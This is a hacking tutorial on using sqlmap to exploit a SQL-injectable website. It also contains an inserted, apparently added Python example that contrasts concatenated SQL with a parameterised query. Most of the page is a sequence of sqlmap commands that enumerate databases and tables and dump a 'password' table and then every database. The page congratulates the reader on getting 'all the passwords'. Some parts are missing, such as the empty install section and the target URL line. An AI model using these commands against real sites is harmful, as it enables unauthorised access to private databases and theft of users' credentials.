Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable website, sqlmap can exploit the database and do a lot of hacking, like getting usernames and passwords. Under certain conditions it can even read and write files on the server.
INSTALLING THE TOOL:-
HOW IS IT POSSIBLE?
Because the developer of that site did not properly escape the parameter id.
Now we will assume that there is a website that has a URL in it like this:-
and it is prone to SQL injection. This can easily be tested by opening the URL with a single quote (') added at the end.
If the site reacts in an unusual way or shows an error, it simply means that the site is vulnerable.
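The missing escaping of the id parameter described above, shown as an added example that is not from the original page. It is a Python/sqlite3 stand-in for the page's subcat.php; the table, data and function names are constructed assumptions. It shows why the single quote produces an error when the parameter is concatenated into the SQL text, and how validation plus a bound parameter removes the flaw.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data standing in for the site's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE subcat (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO subcat VALUES (?, ?)",
                   [(5, "books"), (6, "music")])
    return db


def lookup_unsafe(db, raw_id):
    # The flaw: the request parameter becomes part of the SQL text itself,
    # so any character in it is parsed as SQL syntax.
    query = "SELECT name FROM subcat WHERE id = " + raw_id
    try:
        return "ok", db.execute(query).fetchall()
    except sqlite3.Error as exc:
        # A database error driven by user input is the "unusual reaction"
        # the single-quote test looks for.
        return "sql-error", str(exc)


def lookup_safe(db, raw_id):
    # Layer 1: id is numeric, so reject anything that is not plain digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return "rejected", []
    # Layer 2: bind the value; it travels as data and is never parsed as SQL.
    rows = db.execute("SELECT name FROM subcat WHERE id = ?",
                      (int(raw_id),)).fetchall()
    return "ok", rows


if __name__ == "__main__":
    db = make_db()
    for value in ("5", "5'"):
        print(repr(value), "unsafe:", lookup_unsafe(db, value))
        print(repr(value), "safe:  ", lookup_safe(db, value))
```

In production the "sql-error" branch is also worth logging and alerting on, since database syntax errors caused by request parameters are a reliable sign that someone is probing the endpoint.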
LET'S GET ON TO IT, SHALL WE:-
Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal.
type:- sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5"
The above is the first command to run with the sqlmap tool. It checks whether the site is vulnerable to SQL injection or not. Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist.
The "--dbs" option is used to get the database list.
type:- sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --dbs
This will tell you the names of the databases (folders) on the server's hard drive (for this situation the database names are confidential and info).
Now, as we know that a database is saved in the form of tables and columns (just like Excel), we can see the names of the tables in the folder we just got the name of by using this command:
type:- sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --tables -D confidential
This will show us the names of the tables in that database. Suppose there is a table by the name "password" (now that is something interesting and confidential).
GETTING EVERYTHING:-
Now comes the most interesting part of extracting the data from the server.
type:- sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --dump -D confidential -T password
Congratulations, you got all the passwords.
You can also dump all the databases of the website using the command
type:- sqlmap.py -u "http://www.vulnerable.com/subcat.php?id=5" --dbs --dump-all